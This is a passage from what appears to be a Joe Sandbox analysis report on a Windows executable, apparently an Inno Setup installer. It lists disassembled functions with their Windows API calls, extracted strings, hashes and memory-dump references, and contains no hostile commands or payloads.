                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3fac7199250898b77632ea887e905273a0ca2a52c1bf25bf17bddf130f7f486a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a5675202604ee279b5d53ebe19463d24adef2e580cd9ada0264daaad7bee20b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE413D70A44208AFDF01EFA5DC42F9E7BB8EB09714F61457AF500F7291D6799E008BA8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0047CB30 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 0047CC32
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: -rI$Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-1821436788
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: eeaf8f24d3af7a089596ccafad4e97ef4eb9e75c1b126193f65e319f63d4f9f7
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6634b889f1a60bd4549a24dd6789ad2f54a0d6468ac2a8038bb9781f42ef23c6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eeaf8f24d3af7a089596ccafad4e97ef4eb9e75c1b126193f65e319f63d4f9f7
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8531E970A00109DFCF11EFA9D9D29EEB7B5EB44304B60847BE808E7241D738AE458B6D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042E428 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 86registrylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E451
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E457
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E4A5
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .DEFAULT\Control Panel\International$=aE$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4190037839-1003587384
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 12fdb461a18bd26f9bb6e23941a40f6737d8ef1f72bafeb3a0990e906de8a19c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6214d84d9e891aa165dd1588e79579c1e4a82babed7fc21810c195be89e1891e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12fdb461a18bd26f9bb6e23941a40f6737d8ef1f72bafeb3a0990e906de8a19c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65215230B10219ABCB10EAE7DC45A9E77A8EB04318FA04877A500E7281EB7CDE41CA5C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00462D5C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 00462D68
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462D7C
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462D89
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462D96
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,00000000), ref: 00462DE2
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462E20
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2610873146-3407710046
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9dfb4a3cae5af9d9c2f538179a93f4b1efcfb432a2de0ffe22a2c57b967af473
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 308e9426e96dcd15a0811dc773674cbbce9379ede84ac64ebea6e7762974983c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9dfb4a3cae5af9d9c2f538179a93f4b1efcfb432a2de0ffe22a2c57b967af473
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8421A775701B046FD3019A64DD41F3B3395DB94714F08453AF944EB381E6B9EC018A9A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042F198 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 0042F1A4
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1B8
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1C5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1D2
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,00000000), ref: 0042F21E
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F25C
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2610873146-3407710046
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6f3a4997be7844ec20251ac5ee3688e31cf42e8aa8cc7237bf8785d579a85920
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f96f766bc13e38d455a6b30724ea53c80225cfaaeacd9570d6dca051b777ffc7
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f3a4997be7844ec20251ac5ee3688e31cf42e8aa8cc7237bf8785d579a85920
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3221D7797057149BD300D664ED81F3B33A4DB85B14F88457AF944DB381D679EC044BA9
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401A90 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00684A00,00000000,00401B68), ref: 00401ACF
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00684A00,00000000,00401B68), ref: 00401AEE
                                                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00682C48,?,00000000,00008000,00684A00,00000000,00401B68), ref: 00401B2D
                                                                                                                                                                                                                                                                                                                                                                  • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                                                                                                                                                                                                                                                                                                  • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID: H,h$L2h$\2h$|2h
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3782394904-2281910222
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00458F80 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045915F,?,00000000,004591C2,?,?,02123858,00000000), ref: 00458FDD
                                                                                                                                                                                                                                                                                                                                                                  • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 0045903A
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 00459047
                                                                                                                                                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00459093
                                                                                                                                                                                                                                                                                                                                                                  • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,004590F4,?,00000000), ref: 004590B9
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,004590F4,?,00000000), ref: 004590C0
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CreateEvent$TransactNamedPipe
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2182916169-3012584893
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ab9aaab2ece2f09dc0e54416c5bbf93f57b6f81e0c692a8386f6b93523f7325c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 50fb7c1009465aa7c5405e125e9101384e11cc4d6b330c20a7fc1de2f8ccdd80
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab9aaab2ece2f09dc0e54416c5bbf93f57b6f81e0c692a8386f6b93523f7325c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68417F71A00608EFDB15DF99C985F9EB7F9EB08714F1044AAF904E72D2C6789E44CB28
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00456B58 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CBD,?,?,00000031,?), ref: 00456B80
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B86
                                                                                                                                                                                                                                                                                                                                                                  • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BD3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                                                                                                                                                                                                                                                                                                  • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1914119943-2711329623
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a935c560e49232419ff924c1fb6a7e15c164213fc0f0d4faedd75b19636fcca6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a27b950e9f8baa5d3fd7d83d3f5f0f06fd95d714c0010da27a3b0cf72a10e13f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a935c560e49232419ff924c1fb6a7e15c164213fc0f0d4faedd75b19636fcca6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB319471B00604AFDB12EFAACC41D5BB7BDEB897557528466FC04D7252DA38DD04CB28
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00416D90 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RectVisible.GDI32(?,?), ref: 00416E23
                                                                                                                                                                                                                                                                                                                                                                  • SaveDC.GDI32(?), ref: 00416E37
                                                                                                                                                                                                                                                                                                                                                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                                                                                                                                                                                                                                                                                                                  • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                                                                                                                                                                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                                                                                                                                                                                                                                                                                                                  • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00416F32
                                                                                                                                                                                                                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                                                                                                                                                                                                                                                                                                                  • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00416F7F
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 375863564-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e860daab3c1e0627df82d7d72d97e7207153c3994c21ca5cfd6880201b2350ff
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e860daab3c1e0627df82d7d72d97e7207153c3994c21ca5cfd6880201b2350ff
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                                                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                                                                                                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                                                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                                                                                                                                                                                                                                                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
